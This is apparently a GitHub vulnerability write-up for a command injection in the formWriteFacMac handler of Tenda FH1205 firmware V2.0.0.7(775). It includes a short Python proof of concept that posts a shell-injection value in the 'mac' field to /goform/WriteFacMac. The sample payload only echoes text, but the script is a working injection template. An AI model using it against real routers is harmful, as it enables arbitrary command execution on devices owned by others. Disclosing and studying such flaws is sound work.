Skip to content

Latest commit

 

History

History
30 lines (19 loc) · 948 Bytes

formWriteFacMac.md

File metadata and controls

30 lines (19 loc) · 948 Bytes
Raw

Overview

Affected version

FH1205 V2.0.0.7(775)

Vulnerability details

The Tenda FH1205 V2.0.0.7(775) firmware, we discovered a command injection vulnerablility in formWriteFacMac function in the v2 parameter and the mac varable is directly passed to a doSystemCmd function, causing an arbitrary command execution. The user-provided mac can trigger this security vulnerability.

image-20240319225415852

POC

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/WriteFacMac"
payload = ";echo 'hello'"

data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)

image-20240320003842782